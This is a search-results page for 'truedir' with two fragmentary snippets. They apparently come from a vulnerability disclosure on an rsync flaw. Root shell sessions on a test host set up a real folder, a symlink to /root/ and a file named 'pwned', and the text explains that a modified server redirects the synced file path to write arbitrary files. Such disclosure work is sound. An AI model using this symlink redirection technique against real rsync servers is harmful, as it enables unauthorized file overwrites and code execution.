search for: truedir

...into the shared folder in rsync:a true folder and a symbolic link are directed to the root directory . [root at pentest rsync]# ls -lh total 8.0K -rw-r--r-- 1 root root 2 Oct 31 03:16 1.txt lrwxrwxrwx 1 root root 6 Oct 31 05:09 fakedir -> /root/ drwxr-xr-x 2 root root 4.0K Oct 31 05:08 truedir Then enter the truedir folder, create a new file name "pwned". [root at pentest rsync]# cd truedir/ [root at pentest truedir]# ls [root at pentest truedir]# echo rsync test > pwned [root at pentest truedir]# ls -lh total 4.0K -rw-r--r-- 1 root root 11 Oct 31 05:17 pwned [root at...

...ers to write to arbitrary files, and consequently execute arbitrary code . Vulnerability Details : First I shared in the Rsync folder to write the following documents [root at pentest rsync]# ls -lh total 8.0K -rw-r--r-- 1 root root 2 Oct 31 03:16 1.txt drwxr-xr-x 2 root root 4.0K Oct 31 05:17 truedir [root at pentest rsync]# cd truedir/ [root at pentest truedir]# ls pwned [root at pentest truedir]# cat pwned rsync test [root at pentest truedir]# Next I modify the server to send the file code,in the process of synchronizing,the path of file "pwned" can be blocked and changed into a...